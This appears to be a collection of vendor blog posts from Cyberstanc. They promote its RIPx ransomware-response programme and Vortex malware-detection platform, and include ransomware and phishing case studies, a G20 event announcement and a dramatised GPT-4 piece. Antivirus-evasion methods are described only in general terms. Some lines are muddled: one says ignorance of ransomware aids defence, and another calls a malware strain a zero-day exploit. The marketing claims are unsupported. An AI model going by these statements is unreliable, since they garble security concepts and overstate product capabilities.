Understanding the Ransomware Threat

Ransomware is a type of malware that encrypts files or locks users out of their systems, demanding a ransom payment in exchange for restoring access. These attacks have targeted organizations across various sectors, from healthcare to finance, exploiting vulnerabilities in systems and networks.

The group uses double extortion – exfiltrating victim data and encrypting it, and threatening to publish the stolen data unless a ransom is paid.

As these malicious attacks continue to evolve and become more sophisticated, it's crucial to arm ourselves with effective defense mechanisms. Ransomware attacks have become a prevalent threat in the digital landscape, causing significant disruptions and financial losses to businesses and individuals alike.

The Birth of RIPx : a revolutionary approach in combating ransomware.

Not knowing the inner workings of ransomware is crucial for thwarting its objectives. This lack of knowledge inhibits replication, secures vulnerabilities, and aids in developing effective countermeasures.

RIPx, short for Ransomware Intrusion Protection Xtreme, represents a proactive strategy against ransomware attacks.

RIPx's inception marks a transformative journey bridging intelligence and detection, revolutionizing intrusion identification. It starts by harnessing global threat intelligence to meticulously profile ransomware patterns.

Our "RIPx" program strategically combats ransomware's decentralized network. Given the intricate complexities within ransomware markets, tracing attackers poses challenges. Our responder focuses on disrupting this web, impeding developers, distributors, and Initial Access Brokers (IABs).

"Focusing on prevention, we employ surveillance and threat intelligence to foresee and deter ransomware assaults."

RIPx Strategies: From Ransomware Strike to Post-Attack Resilience

RIPx Strategies shift focus from responding to ransomware strikes to bolstering pre and post-attack resilience. Armed with advanced technologies, it proactively thwarts and neutralizes threats.

The imperative moment is here—opting for the right defense mechanisms and swift actions is crucial to safeguard against and eliminate ransomware intrusions.

Scrutiny Anti-Ransomware Engine: RIPx employs advanced behavioral analysis engine to detect anomalies in system behavior. This proactive approach enables the system to identify potential ransomware activity before it can cause significant damage.

Ransomware Responder Service: Leveraging Simulation intelligence models, RIPx continuously learns from patterns and trends in data, enabling it to adapt and evolve in the face of evolving ransomware threats.

CRYPTO-CAGING: RIPx offers real-time monitoring of system activities and immediate response mechanisms. This proactive approach helps in isolating and neutralizing potential ransomware threats before they can spread across the network.

RIPx Ripple Effect

Over the past four years, RIPx (Ripple Effect) Cybersecurity has pioneered cyber resilience through its cutting-edge Simulation Lab.

With international partnerships in Threat Intelligence, governmental agencies, and elite professionals from the USA, Russia, China, Korea, and Turkey, RIPx focuses on advancing malware and ransomware taskforces. Our Ransomware Responder Program collaborates with researchers to test diverse modes, ensuring robust cyber defense.

"https://cyberstanc.com/ripx/"

"https://www.mach37.com/blog/2021/1/19/cyberstanc-introduces-newest-addition-ripx"

How RIPx is new game changer !!

In the non-stop battle against ransomware, a game-changer has surfaced: the Core Feature Hunting (CFH) approach. It's not a tool—it's the secret weapon we've been longing for in this relentless fight.

Addressing issues of data scarcity and class imbalance, CFH employs a novel strategy by harnessing a range of classifiers—such as Support Vector Machines (SVM), Random Forest (RF), and Logistic Regression Classifier (LRC)—trained on derived deep features.

For instance, the SVM classifier excels in establishing complex decision boundaries within the feature space, while RF, with its ensemble of decision trees, proficiently captures intricate relationships among features. Conversely, LRC, being a linear model, emphasizes the importance of individual feature weights, offering interpretability alongside detection capabilities.

For instance, this extraction method identify key behavioral patterns within ransomware attacks, such as file encryption methods or specific system interactions.

Training on Different Feature Spaces: The Ensemble Strategy

Our approach to fortifying our scrutiny engine involves a meticulous sequence of steps, orchestrating a unified and powerful defense against ransomware at every turn.

By curating a blend of classifiers chosen for their precision and recall metrics, we've constructed a ransomware-sensitive ensemble. This ensemble capitalizes on the unique strengths of each classifier, forging a collective defense mechanism that excels in detecting a wide array of ransomware variations.

Precision-Recall Driven Detection Sorting Framework

The selection of optimal base learners is a pivotal step in forming a ransomware-sensitive ensemble. CS Team employs a sorting process based on precision and recall. This meticulous evaluation ensures that the chosen classifiers demonstrate high precision and recall, crucial metrics in detecting and mitigating ransomware threats.

Benefits of Implementing RIPx

In a landscape where ransomware attacks continue to evolve, RIPx stands as a beacon of hope, providing a powerful defense against these digital extortion schemes.

Enhanced Security Posture: RIPx significantly bolsters an organization's security posture by proactively identifying and neutralizing ransomware threats.

Reduced Downtime: Swift detection and response minimize downtime, ensuring business continuity even in the face of potential ransomware attacks.

Cost Savings: By preventing ransomware attacks, organizations can avoid the costly ransom payments and potential loss of data, saving significant financial resources.

Case Studies

Case 1 : A finance conglomerate (UK)

Incident Overview:

A finance conglomerate was targeted by BlackCat/ALPHV ransomware, exploiting the CVE-2023-4966, aka Citrix Bleed. Initial compromise affected 12 machines, escalating to 150 due to an HR system breach.

Attack Vector:

The attacker exploited a Citrix vulnerability (CVE-2023-4966) for initial infiltration, compromising 12 machines. Subsequently, a HR system breach enabled the attacker to proliferate to a total of 150 machines.

Data Compromise:

BlackCat/ALPHV ransomware executed the encryption process on compromised systems. Sensitive data was at risk, prompting urgent action.

Response Strategy:

Utilizing our Scrutiny BlackCat /ALPHV module, our researchers thwarted ongoing encryption across all 150 machines. Swift response prevented data loss and potential financial impact.

Lessons Learned:

1. Timely patching of known vulnerabilities is crucial.
2. Scrutiny BlackCat/ALPHV module demonstrated its efficacy in halting ransomware process and detecting malware at initial stage, showcasing its vital role in cyber defense.

Case 2 : Industrial manufacturing giant (India)

Previous Reference: https://cyberstanc.com/blog/exposed-the-shocking-truth-about-purecrypter-attack-chain-and-its-connections-to-pakistan/

Introduction:

A prominent manufacturing corporation's server recently fell prey to an advanced cyber-attack. The attacker employed Mallox ransomware, a type of malicious software designed to encrypt data and demand a ransom for its release.

Attack Methodology:

The attacker breached the infrastructure, targeting a single Microsoft SQL (MSSQL) server. The initial attack vector was the deployment of PureCrypter loader, a malicious software used to drop other malware into the system.

Data Exfiltration & Lumma Stealer Execution:

The PureCrypter loader decrypted Lumma Stealer in the memory, which is designed to collect sensitive data such as cookies, usernames and passwords, credit card numbers, connection history, and cryptocurrency wallet data.

Additionally, the loader decrypted a custom stealer that traversed directories recursively, seeking out file formats like documents, images, and Excel sheets. This implied that the attacker's goal was rapid exfiltration of potentially valuable data.

Victim Management & Mallox Ransomware Encryption:

The attacker maintained control over the victim's compromised endpoints through a Cobalt Strike beacon, a commercial, full-featured, remote access tool.

This facilitated activities such as infrastructure reconnaissance, privilege escalation, and lateral movement. Finally, the Mallox ransomware binary was dropped, encrypting all machines under control.

Threat Mitigation:

Scrutiny endpoint sensor was able to identify and neutralize all active infections, including the initial access point of Pure Crypter and Mallox ransomware strain. The restoration of the encrypted machines was achieved through the Scrutiny Mallox module, a product of our dedicated R&D team.

Conclusion:

This case underscores the necessity of strong cybersecurity measures, especially for large organizations handling sensitive data. The attack serves as a reminder of potential system vulnerabilities and the importance of proactive defense mechanisms.

The Comparative Advantage: Cyberstanc Affiliates vs. Ransomware Group Affiliates

Conclusion

To explore opportunities with the RIPx program, feel free to contact us directly or tap into our extensive network of partners, including MSSPs and resellers, to begin your journey toward collaboration and innovation. For further details, email us at info@cyberstanc.com.

We'll promptly provide comprehensive information and support regarding the RIPx program and its implementation.

RIPx represents a paradigm shift in ransomware defense strategies, offering a proactive and robust approach to combatting these malicious threats.

By leveraging advanced technologies and proactive monitoring, RIPx empowers organizations to thwart ransomware attacks before they cause irreparable harm.

Stay protected. Stay proactive.

RIPx - kick ransomware to the curb!!

Cyberstanc's Strategic Role in Enhancing National Defense Through G20 Cybersecurity Leadership

In today's interconnected world, where digital innovation drives progress across all sectors, the realm of cybersecurity stands as a bulwark against an evolving landscape of threats and vulnerabilities.

Yet, the flip side of this coin reveals an intricate tapestry of threats, from sophisticated cyberattacks to data breaches that could compromise individuals, corporations, and even national defense.

This brings us to the crux of Cyberstanc's mission – to unravel these complexities and devise innovative solutions that bolster cybersecurity in the face of emerging technological paradigms. It's not merely about safeguarding data; it's about ensuring the integrity of democratic institutions, preserving national sovereignty, and fostering a secure environment that nurtures innovation.

G20: A Confluence of Minds for a Safer Digital Frontier

G20 assembles brilliant minds globally, uniting for a secure digital future. A melting pot of insights, strategies, and innovation, fostering a safer, more resilient digital landscape.

Cyberstanc's selection to participate in the G20 Event is not only an honor but also a testament to its commitment to securing the digital future. Scheduled for the 13th and 14th of July 2023 in Gurugram, Haryana, India, this event gathers luminaries, policymakers, and thought leaders from around the world.

At the heart of Cyberstanc's vision is the imperative to align technological advancements with national defense. The interconnectedness of modern infrastructure demands a multifaceted approach, where proactive strategies, predictive analytics, and collaborative frameworks can thwart potential cyber threats before they manifest.

This event serves as a crucible for forging these strategies, allowing Cyberstanc to interact with influencers such as the Honorable Union Home Minister and Minister of Cooperation, Shri Amit Shah, as well as representatives from G20 India,  Ashwini Vaishnaw, Ministry of Electronics and Information Technology, National Cybersecurity Coordinator (NCSC), Intelligence, G20-DIA, Data Security Council of India (DSCI), and NASSCOM.

A Call to Action: Nurturing a Secure Digital Ecosystem

Cyberstanc's participation in the G20 Event signifies not only its expertise but its dedication to contributing to the betterment of national defense through cutting-edge cybersecurity measures. In a world where cyber threats transcend geographical boundaries, collaboration becomes paramount. The mission is clear: to architect a secure digital landscape that emboldens innovation, protects critical infrastructure, and bolsters national security.

1. Malware Mitigation Breakthroughs: Cyberstanc's G20 cybersecurity leadership drives innovative malware detection and eradication strategies. Our advanced algorithms and real-time threat analysis shield critical infrastructure from evolving digital menaces.
2. Threat Landscape Revolution: Through G20 collaborations, Cyberstanc pioneers a paradigm shift in threat intelligence. Our predictive models decode threat patterns, enabling proactive defense mechanisms that neutralize emerging cyber risks.
3. Elevated R&D Nexus: Cyberstanc's alliance with government bodies and academia establishes a cutting-edge R&D center. Fueled by collaborative brainpower, we birth ingenious technologies for preemptive national defense against cyber threats.
4. Catalyzing Cyber Command Centers: At the forefront of the G20 cybersecurity dialogue, Cyberstanc fuels cyber command centers with groundbreaking threat intel reports. Our insights galvanize collective action, turning information into a potent shield.
5. Institutionalizing Knowledge Exchange: Through G20 initiatives, Cyberstanc orchestrates knowledge exchange between diverse stakeholders. Our participation in Cyber Command Centers enhances collective resilience, making cybersecurity a shared endeavor.

As we anticipate the event's commencement, we extend an invitation to our network, partners, and cybersecurity enthusiasts to engage with us in this pivotal journey. The challenges are formidable, but with a shared commitment, innovative strategies, and a resolute mindset, we can emerge victorious in the battle to secure our digital future.

In the words of Cyberstanc's CEO, Rohit Bankoti

"Let's seize this remarkable opportunity, raise the bar, and make a lasting impact on cybercrime prevention and security."

The G20 Event is more than a platform; it's a launchpad for a secure, interconnected, and resilient future. Together, let's build a digital world where innovation flourishes within the bounds of robust cybersecurity – a world that is not just safer, but also smarter.

Did you know that the term "ghost in the code" is inspired by the famous philosophical thought experiment known as the "Chinese Room" argument?

In this scenario, a person who does not understand Chinese is locked in a room with a book containing instructions in English on how to respond to Chinese text. The person follows the instructions to generate appropriate responses, fooling others into thinking they understand Chinese.

This experiment raises questions about whether genuine understanding and consciousness can arise solely from manipulating symbols or code, just like the ghost in the machine.

Let's talk about today NEW AI BOX

GPT-4's Puzzle-Solving Ability
Artificial General Intelligence, GPT-4: A Closer Look at its Capabilities
Implications and Risks of AGI and LLMs
The Need for Balanced Perspectives; Cyberstanc's Research and Dedication

In the not-too-distant future, GPT-4's puzzle-solving ability becomes legendary, propelling AI towards achieving Artificial General Intelligence (AGI). Controversies and skepticism fuel intense debates, while cyberstanc invests in research to explore GPT-4's full capabilities. As society grapples with the implications and risks, maintaining balanced perspectives becomes crucial in navigating potential crises on the path to a more intelligent future.

AI making human reasoning, GPT-4's Puzzle-Solving Ability

In a chilling turn of events, a new artificial intelligence system called GPT-4 has emerged, displaying hair-raising human reasoning abilities. The story begins with an ambitious experiment to test the AI system's understanding of the physical world. Little did they know what they were about to uncover.

As they presented GPT-4 with a perplexing puzzle involving a book, nine eggs, a laptop, a bottle, and a nail, they expected a straightforward response. However, what they received was beyond their wildest imaginations. The AI system's solution was not only ingenious but also demonstrated a level of reasoning reminiscent of human intelligence.

This unprecedented display of human-like reasoning left the researchers questioning whether they had stumbled upon a new form of intelligence altogether. Their findings were documented in a research paper titled "Sparks of Artificial General Intelligence," published on an internet research repository. This publication, coming from a major tech company sent shockwaves through the industry, igniting a heated debate.

"https://arxiv.org/abs/2303.12712"

"https://arxiv.org/pdf/2303.12712.pdf"

Artificial General Intelligence

The pursuit of artificial general intelligence, or AGI, has long captivated the minds of technologists. AGI represents the pinnacle of AI development—a machine capable of emulating any task that a human brain can perform. However, claims related to AGI have proven to be treacherous waters for computer scientists. Varying interpretations of intelligence and the potential dangers associated with AGI make it a topic shrouded in controversy.

In the not-too-distant future, the puzzle-solving ability of GPT-4 becomes legendary, pushing the boundaries of artificial intelligence towards the coveted goal of Artificial General Intelligence (AGI).

Despite the challenges, AGI development opens up a world of possibilities and potential applications.

Here are some exciting future use cases:

1. Medical Breakthroughs: AGI-powered systems can analyze vast medical databases, identify patterns, and assist in diagnosing complex diseases, leading to more accurate treatments and personalized healthcare.
2. Autonomous Transportation: AGI-enabled self-driving vehicles can revolutionize transportation by enhancing safety, reducing traffic congestion, and improving overall efficiency, leading to smoother and more accessible mobility for all.
3. Advanced Robotics: AGI-driven robots can perform intricate tasks in various industries, from manufacturing and construction augmenting human capabilities and increasing productivity.
4. Scientific Discoveries: AGI can assist scientists in analyzing complex data sets, simulating experiments, and uncovering new insights across disciplines such as physics, chemistry, and astronomy, accelerating our understanding of the universe.
5. Creative Endeavors: AGI systems can generate original music, artwork, literature, and other forms of creative expression, collaborating with human artists and pushing the boundaries of artistic innovation.

Implications and Risks of AGI and LLMs

From politics to physics, history to computer science, medicine to philosophy, GPT-4 synthesizes information and provides nuanced responses that astound its human counterparts.

GPT, Bard, and other LLMs hold great promise in the realm of AI and natural language processing. However, to leverage their full potential in critical applications, one must be well-versed with their limitations.

1️⃣ Accuracy: While LLMs can generate text that appears coherent, the accuracy of the information cannot always be guaranteed. It's important to fact-check and verify the generated content.

2️⃣ Fact Rewind: The true power of LLMs lies in their ability to generate coherent and contextually relevant text, rather than merely recalling facts – a feat even the most basic databases excel in. LLMs are not a substitute for comprehensive knowledge.

3️⃣ Explainability: It can be challenging to discern the rationale behind the text generated by LLMs, making their explainability limited. Understanding the reasoning behind their outputs becomes crucial in critical decision-making scenarios.

4️⃣ Ethical Considerations: LLMs raise important ethical concerns, such as biases present in the training data and potential misuse of AI-generated content.

While LLMs have their limitations, they still offer tremendous value in various applications. However, it is vital to approach them with a critical mindset and use them as tools, complementing human expertise and judgment.

In this era of rapidly advancing AI technologies, understanding the limitations of LLMs ensures responsible and informed usage, paving the way for more accurate, reliable, and ethically sound AI applications.

The future holds both great promise and potential challenges as AGI shapes our world. By embracing a balanced perspective and ensuring a responsible approach, we can navigate the ever-changing landscape of AGI and unlock its transformative potential while mitigating its inherent risks.

The future holds both great promise and potential challenges as AGI continues to evolve and shape our world.

The Need for Balanced Perspectives; Cyberstanc's Research and Dedication

As we venture further into the era of AGI development, these exciting possibilities demonstrate the potential for revolutionary advancements in various fields. However, the major crisis ahead will test our ability to navigate the ethical, societal, and existential challenges that come with creating machines that rival human intelligence.

Despite the skepticism surrounding AGI claims, experts argue that the advancements made in AI, especially with systems like GPT-4, have brought us closer to achieving genuine human-like reasoning.

Developed by OpenAI, GPT-4 represents the epitome of language models, having meticulously analyzed vast amounts of digital text. It can generate its own coherent and contextually relevant text, engage in conversations, and even produce mathematically poetic proofs.

The emergence of AGI raises the need for balanced perspectives and cautious approaches. Whether this development represents a significant stride or a mere stepping stone is yet to be determined. As we delve into the possibilities and challenges posed by increasingly intelligent machines, it is essential to maintain a nuanced understanding.

As a ghost in the code, We'll continue to observe and report on the developments in AI, shedding light on the fascinating intersections between technology and humanity.

With the power and potential of AGI, it becomes crucial to monitor and limit its use cases, ensuring responsible and ethical implementation.

Amidst these debates, Cyberstanc emerges as a leading force in shaping the future of technology. With their commitment to staying ahead of cyber risk and threats, their cutting-edge cybersecurity solutions, such as the Vortex platform, empower organizations to safeguard their digital and future assets.

At Cyberstanc, we are committed to pushing the boundaries of technology through our dedicated R&D center.

We strive to explore new frontiers and advance the field of AI, opening doors to exciting possibilities. If there's a specific area of technology you'd like us to highlight or delve into, let us know!

Stay tuned for more intriguing tales from the realm of artificial intelligence and cybersecurity. We appreciate your support and encourage you to like and comment on our blog posts.

It is common for malware samples to remain undetectable for hours or days or even weeks.

This is because malware writers are continuously creating new techniques to evade detection. As a result, it is necessary for users to have a comprehensive and fast detection rate for malware.

To use VirusTotal or other multi-scanning platforms, users can submit a file on the website or use the email submission feature. Users can also search the existing database of scanned files based on a sha1, sha256, or md5 hash value. After the upload, the file is scanned with different products and their engines, and the results are available for everyone.

To bypass antivirus software, malware creators often use techniques like obfuscation, encryption, and polymorphism.

Obfuscation is the process of disguising the code to make it harder to detect. Encryption involves encrypting the malware code to make it unreadable to antivirus software. Polymorphism is the ability of malware to change its code every time it's executed, making it even more difficult to detect.

In case some products or engines are not detecting the sample as malware, the file was not rated malicious by using the signatures provided in that particular engine or product.

If a malicious file is not detected as malicious in such a multi online scanner, users cannot automatically conclude, out of this analysis, that some new malware is actually not detected or stopped by their AV product.

To combat malware bypassing, antivirus software vendors use a variety of techniques. One such technique is behavioral analysis, which involves analyzing the behavior of the malware rather than its code. Another technique is machine learning, which involves training a machine learning algorithm to recognize malware based on patterns in the code.

A huge difference users should know about while using the public services. The online multi scanner analyses can give users an initial idea of the file checked, but not more. Users need to know how to interpret and read the results properly.

Unfortunately, some script kiddies or wannabee malware writers are still using public online scanning services to test their newly created malware creations and to check whether they are detected or not.

Underground members have set up their own services and sites where they can upload their own new malware. These sites are not forwarding the files to the security software vendors. If users stumble upon such an underground scanner website, they cannot rely upon the results presented.

Case Study:- Beware of Valyrian Malware: Named After Game of Thrones' Indestructible Steel, Now Targeting Your Computer

Valyrian Malware, named after the indestructible steel in Game of Thrones, is a particularly dangerous malware that poses a significant threat to computers and cybersecurity. The malware is distributed through fake Windows updates, malicious third-party applications, or weaponized attachments sent via email or social media.

Recently, a phishing attempt targeted an unsuspecting recipient with a password-protected ZIP file containing a malicious Word document. Once the malware infects a system, it remains concealed and executes its malicious activities every time the computer is turned on. This makes it particularly difficult to detect and prevent, as traditional anti-virus solutions may not be able to identify the malware.

It is important to note that Valyrian Malware can be disguised in innocuous-looking files like 'Chinese Delegation.doc.' This highlights the need for computer users to exercise caution when downloading or opening attachments, especially from unknown or suspicious sources.

Valyrian Malware is an example of a zero-day exploit, which means it is a vulnerability that is unknown to software developers or security professionals. As a result, there may not be any available patches or fixes to prevent the malware from infecting a system.

Valyrian Malware is capable of performing a wide range of malicious activities, including stealing sensitive information, installing other malware, or even taking over control of the infected computer. The malware is designed to remain undetected for as long as possible, making it a dangerous and persistent threat.

The recent phishing attempt used a password-protected ZIP file containing a malicious Word document that exhibited heuristics such as macro with DLL reference and macro with startup hook, common tactics for accessing APIs. This breakthrough in threat detection and prevention is a game-changer. However, there are still many anti-virus solutions that are unaware of the threat.

This myth is probably because people equate signatures with pattern-based detection.

AI-based malware detection is not a replacement for traditional antivirus software but a new complement to it.

The undecidability of virus/malware detection does not mean it is impractical, but constant work and improvements are necessary to stay useful.

New methods go far beyond pattern signatures and hashes, including emulation, deep scanning, in-memory scanning, algorithm-based signatures, behavior blockers, network scanning, and artificial intelligence (AI).

EDR/Antivirus products cannot afford false positives and are unfairly compared to applications that can avoid disrupting legitimate user activity.

VirusTotal testing strategy is flawed because scanning engines on VirusTotal only support a fraction of the capabilities that the real products have.

Malware developers are actively trying to create malware that antivirus products cannot detect.

AI technologies serve many purposes, including malware clustering, malware detection on client systems, and automatic signature creation.

The Role of Emulation and Depth Scanning in Malware Detection

Recently, an innocuous looking file named 'Chinese Delegation.doc' 2ffd8e9fc1f91c6ce5570131ae5dc0607bfc283012e33db4f489db0ff1ccbaf5 was used in a phishing attempt that could have caused significant damage. The file was actually a password-protected ZIP file containing a malicious Word document, which exhibited heuristics such as macro with DLL reference and macro with startup hook. These are common tactics for accessing APIs, which can be used to carry out cyber attacks. .

Traditional antivirus solutions were unable to detect the malware until 1-2 weeks after the initial attack. In fact, many antivirus solutions still lack the ability to detect such threats. The hash "2ffd8e9fc1f91c6ce5570131ae5dc0607bfc283012e33db4f489db0ff1ccbaf5" is a virus dropper that was uploaded with few detections, and later adopted by AV vendors.

To bypass solutions, attackers use several techniques.

For example, they might encrypt the payload using various encryption techniques. They also obfuscate the code, so that it becomes difficult to reverse engineer.

Another technique is to create a dropper that downloads the payload from a remote server, making it difficult for the antivirus to detect.

One of the most common techniques used by attackers is "fileless malware." This type of malware operates entirely in memory and leaves no footprint on the system's disk. It runs as part of a legitimate process and is almost impossible to detect using traditional antivirus solutions.

Some EDR/Antivirus solutions have been using other malware detection technologies for at least a decade. These technologies include emulation, depth scanning, in-memory scanning, algorithm-based signatures, behavior blockers, network scanning, and more. While other antivirus solutions still use pattern signatures and hashes.

The Risks of Relying Solely on Signature Hash Pass in Malware Defense

The process of re-scanning entails the submission of a previously analyzed file to VirusTotal and performing a fresh analysis utilizing the latest versions of antivirus (AV) engines.

This enables researchers to ascertain if new detection techniques have been implemented and if the AV engines have updated their databases with new signatures for known malware or new nomenclature based on scanning.

The practice of re-scanning a previously analyzed file can potentially result in the detection of previously unnoticed threats, which can then be flagged and added to the AV databases.

This approach enhances the detection and prevention capabilities of all users. However, it should be noted that this method relies on the collection of signature database hashes against new variants or existing malware families.

In conclusion, malware detection is an ongoing battle between attackers and defenders.

If these solutions are not regularly updated or evolved, they are doing nothing to participate in the cyberwar between anti-malware software and malware authors.

As many advance APT and ransomware groups use various techniques to hide the internals of malware, making it difficult to detect and analyze. Packer compresses the original malware file, making it unreadable until it decompresses itself at runtime.

Crypters encrypt, obfuscate, and manipulate malware to make it difficult for security programs to detect. Protectors are software that keeps an application encrypted and protected against reverse engineering, with some added features that build several protective layers around the payload that researchers have to face.

Although these techniques make it challenging to detect and analyze malware, tools and programs are available to identify commercial packers and advise on how to unpack them.

Don't wait until it's too late to secure your organization's digital assets. Cyber threats are constantly evolving, but so are our cybersecurity solutions. Our team at Cyberstanc is committed to staying ahead of the curve and providing the latest in threat intelligence, malware detection, and analytics.

Interested in learning more? Shoot us an email at sales@cyberstanc.com and let's start a conversation about how we can help you protect your organization. With Vortex, our powerful cybersecurity platform, you'll have access to cutting-edge technology that can help you stay one step ahead of cybercriminals.

Our R&D center is always developing new technologies to fight against malicious software and APT groups. And with our Pay-As-You-Go model, you can be sure that you're only paying for what you need.

So why wait?

Try our flagship Vortex and Scrutiny technologies today and see the difference for yourself.

The rise of cyber attacks and supply-chain attacks has made it necessary for businesses to invest in advance protection to protect against malware and advance threat to enhance overall protection capabilities.

In this blog, we will delve deeper into what Cyberstanc Vortex is and how it offers better technology and detection prospects than other available platforms.

Cyberstanc Vortex is a cutting-edge threat detection platform that is set to revolutionize the way organizations protect themselves from cyber threats. It is a platform that combines state-of-the-art tools, services, and proprietary engines to extract Indicators of Compromise (IOCs) and threat information from files, documents, images, and unknown file types at scale and speed.

Inspired by the natural abilities of the peacock, this cutting-edge platform is designed to excel at catching all kinds of cyber threats - just like how the peacock excels at catching worms, rats, snakes, and other creatures. But that's not all. The peacock's iridescent feathers attract mates, just like the scrutiny engine detects unnoticed malware, and offers protection against predators.

The solution goes deeper than traditional static analysis tools and provides actionable intelligence in many more cases, reducing the number of artifacts that need to be sandboxed in an otherwise time-consuming and resource-intensive process.

**State-of-the-Art Threat Detection**

The Cyberstanc Vortex platform offers a technical demo showcasing its easy API integration and agent-based use cases for endpoint, network, email, and storage protection. Its state-of-the-art threat detection system covers most of the grey areas that attackers target or plan to exploit in the future.

Scrutiny integrated engine and custom co-build agent includes wide range of executables, documents, scripts, and common file-types.

Simulation Intelligence of highly obfuscated and real-word malware techniques including macro malware, VBA, VBS, PowerShell, DOCx, Calender files, One-Note, Jscript, MSHTA, XSL, and WSF.

Rapid and deep analysis at high scale, REST API for automated integration.

Simple and cost-effective on-premises standalone deployment or public-private cloud.

Designed, engineered, and maintained by experienced Cyberstanc experts.

Vortex integrates with other security infrastructure, including YARA and MITRE ATT&CK framework, to provide accurate threat detection. Users can add custom YARA rules, and the platform automates some of the analysis and mitigation tasks, reducing the workload of human analysts.

Vortex's Approach to Detection: Transparency, Interpretability, and Accuracy

Vortex places great emphasis on transparency and accountability in their detection engine, recognizing the importance of understanding how a detection system works in order to build trust in its accuracy.

With detailed information on how our detections are designed, built, and how decisions are made, security teams can be confident in their ability to detect and respond to threats. Additionally, Vortex strives to minimize false positives while maintaining interpretability and transparency, striking a balance between detection accuracy and threat visibility.

By offering a guarantee of performance for their managed or curated detections, Vortex further reinforces their commitment to transparency and accountability. This not only builds trust in their system but also helps to reduce the risk of false positives. Overall, Vortex's approach to detection emphasizes trust and transparency, which is increasingly important in an industry that is moving towards more sophisticated detection methods.

Streamline Your Threat Analysis with Next-Gen Tools and REST API Integration

The Vortex API provides a way for developers to interact with the Vortex detection engine programmatically. The API documentation includes endpoints for various functions such as user registration, login, file upload, and download.

Developers can use these endpoints to integrate Vortex's detection engine into their own security applications or workflows. For example, a security application could use the Vortex API to scan files for malware before allowing them to be uploaded to a server.

To ensure security, the Vortex API uses token-based authentication, which requires users to authenticate using an access token. This helps to prevent unauthorized access to the API and ensures that only authorized users are able to interact with the Vortex detection engine.

Understanding the Recognized Media Formats for Deep Archives

Note: When using a file upload feature, it's important to keep in mind that the maximum default file size is 99MB per upload. However, this can be configured to accommodate larger file sizes in on-premises deployments.

Additionally, it's worth noting that the MIME type of the uploaded file is automatically detected regardless of the provided file suffix. This can help ensure that the uploaded file is processed and handled correctly, regardless of any discrepancies between the file extension and its actual contents.

Common Archives: 7Z, ACE, GZIP, LZIP, ISO, RAR, TAR, ZIP

Microsoft Office Files: DOC, DOCM, DOCX, DOT, DOTM, DOTX, PPSX, PPT, PPTM, PPTX, XLS, XLSM, XLSX

Email Files: EML, MBOX

Web Files: HTA, HTML, SVG

Scrutinized-Eyes on Malware Installation File Types: .exe, .dll, .bat, .cmd, .js, .vbs, .docm, .xlsm, .pptm, .jar, .py, .scr, .reg, .ps1, .hta, .chm, .lnk, .msi, .pif, .com.

Automating Analysis and Mitigation Tasks with Vortex Integration

Integration of the Vortex with existing security infrastructure could provide several benefits.

First, it could improve the accuracy of threat detection by incorporating machine learning algorithms into the analysis process, users can add custom YARA rules, and threat feeds integration with a TIP, SOAR, SIEM system, such as Microsoft, IBM or Splunk.

Second, it could improve the response time to cyber threats by automating the mitigation process. In addition, the Vortex's automated mitigation process can continuously learn and adapt to new threats, improving its effectiveness over time.

Third, it could reduce the workload of human analysts by automating some of the analysis and mitigation tasks. For example, the Vortex can be configured to prioritize high-risk threats and take immediate action to mitigate their impact, while lower-risk threats can be flagged for further analysis by human analysts.

Get the Best of Both Worlds with Vortex Cloud and On-Premises Deployment

To support both cloud and on-premises deployment of Vortex, the platform can be installed and configured to run on cloud infrastructure such as Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP). This allows customers to take advantage of the scalability and flexibility of cloud computing while still benefiting from Vortex's malware detection capabilities.

For on-premises deployment, customers can install Vortex on their own servers or hardware with minimum server configuration of Window/Ubuntu Server, 8 vCPUs, 16GB RAM, and 32GB SSD. Customers can scale up their hardware configuration based on their specific needs and the number of scans they require per day.

Scaling Vortex for High-Volume Scanning Needs

The peak performance for a single-server deployment of the Vortex is 50,000 scans per day or approximately 1,500-2500 scans per hour. The average processing time per scan is around 3-5 seconds, though it can vary based on the input mix.

If the customer requires more than 100,000 scans/day, a custom multi-server setup is necessary and needs to be scoped out with the engineering team.

Cyberstanc Vortex vs. Virus Total: A Technical Comparison

When it comes to malware detection and analysis, VirusTotal is a popular tool that is often used by security analysts and researchers. It allows users to upload files and URLs for scanning, and uses multiple antivirus engines to detect any potential threats.

Cyberstanc Vortex provides comprehensive analysis by examining metadata, file structure, and relationships between files to identify threats with simulation intelligence. Its ability to analyze third-party apps sets it apart such as plugins and extensions, to detect any hidden threats.

Another advantage of Cyberstanc Vortex is its ability to provide actionable intelligence. Major anti-virus solutions in Virus Total may flag a file as suspicious, but they may not provide any information on how to mitigate the threat.

Finally, Cyberstanc Vortex detections accuracy is much faster than traditional anti-virus solutions, who majorly rely on malware signature. It can analyze files and codes at scale and speed, allowing security teams to quickly identify and respond to threats. Additionally, it reduces the number of artifacts that need to be sandboxed, saving time and resources.

With Cyberstanc Vortex, however, users receive detailed information on the nature of the threat, including the type of malware and its behavior. This allows security teams to take immediate action to contain and remediate the threat.

** No-Data Acquisition Policy: A Game Changer in User Privacy

Cyberstanc Vortex is designed with user privacy in mind. The platform does not collect any data from the user or their system. No company information is uploaded to mass users or any third party without the user's consent. This ensures that the user's data is safe and protected.

Problem-solving Industry case studies

The Vortex is a powerful tool that can help organizations across different industries protect themselves from cyber threats.

Here are some examples of how the Vortex can be used in specific industries:

Financial institutions are no strangers to cyber threats, particularly when it comes to banking trojan, data-theft and ransomware attacks.
For example, the Vortex can be integrated into a financial institution's security infrastructure to analyze suspicious emails and attached documents. It can also monitor file activity to detect any unusual behavior that may signal a malware or ransomware attack.

Critical infrastructure is also vulnerable to cyber threats that could have catastrophic consequences. The Vortex can be used to create air-gap containers and train models to determine what data should be allowed to pass through the container.
For example, a critical nuclear or power plant could use the Vortex to analyze data from sensors and determine if any readings indicate a potential safety risk. If a safety risk is detected, the Vortex could take action to mitigate the risk.

In the supply chain, the Vortex can be used to analyze and validate new software before it is applied to a system.
For example, a software development company could use the Vortex to analyze a new release and determine if it contains any malicious code. If it does, the company could take action to remove the malicious code before releasing the software to customers.

The military could also use the Vortex to detect and mitigate cyber threats at the local level.
For example, if a military installation notices suspicious activity on their network or reverify a usb, the Vortex could analyze the activity to determine if it poses a threat. If it does, the Vortex could then take action to neutralize the threat.

Final thoughts

It offers a wide range of features that go beyond the capabilities of traditional static analysis tools, making it an ideal choice for organizations looking to enhance their security posture.

Unlike other threat intelligence platforms, Cyberstanc Vortex does not collect any data or upload any company information, making it a reliable and trustworthy choice for organizations concerned about data privacy and security.

